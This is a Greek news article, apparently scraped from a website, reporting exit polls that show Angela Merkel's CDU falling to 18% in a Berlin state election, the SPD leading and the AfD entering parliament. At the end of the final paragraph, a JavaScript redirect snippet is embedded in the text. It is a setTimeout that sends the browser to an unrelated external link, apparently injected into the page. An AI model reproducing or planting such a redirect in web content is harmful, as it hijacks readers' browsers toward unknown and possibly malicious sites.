Βαριά εκλογική ήττα «βλέπουν» τα exit poll για τη Μέρκελ

0
7

Η μεταναστευτική πολιτική της έχει στοιχίσει στην καγκελάριο που δέχεται το ένα εκλογικό πλήγμα μετά το άλλο. Έτσι μετά τη βαριά ήττα στην εκλογική της περιφέρεια στο ανατολικό κρατίδιο Μακλεμβούργου- Πομερανίας, έρχεται νέο χαστούκι για την Άνγκελα Μέρκελ, καθώς στις τοπικές εκλογές του Βερολίνου τα exit poll δίνουν νέα εκλογική ήττα.

Το συντηρητικό Χριστιανοδημοκρατικό Κόμμα της (CDU) καταγράφει τα χαμηλότερα ποσοστά του, μετά την ενοποίηση, ενώ το λαϊκιστικό και εχθρικό στους μετανάστες κόμμα Εναλλακτική για τη Γερμανία (AfD) πιστώνεται στα exit poll ποσοστό 11,5 % και κατορθώνει να εξασφαλίσει εκπροσώπηση στο δέκατο από τα 16 τοπικά Κοινοβούλια της Ομοσπονδίας, σύμφωνα με το ARD.

Τα exit pols μετά τη λήξη της ψηφοφορίας δίνουν στους Χριστιανοδημοκράτες 18%, από 23,3% στις προηγούμενες εκλογές του 2011, ενώ το Σοσιαλδημοκρατικό Κόμμα (SPD) αναδεικνύεται πρώτο κόμμα με 23%.

Οι Σοσιαλδημοκράτες προσανατολίζονται πλέον στη διάσπαση της μεγάλης συμμαχίας με τους Χριστιανοδημοκράτες στην τοπική κυβέρνηση της γερμανικής πρωτεύουσας. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here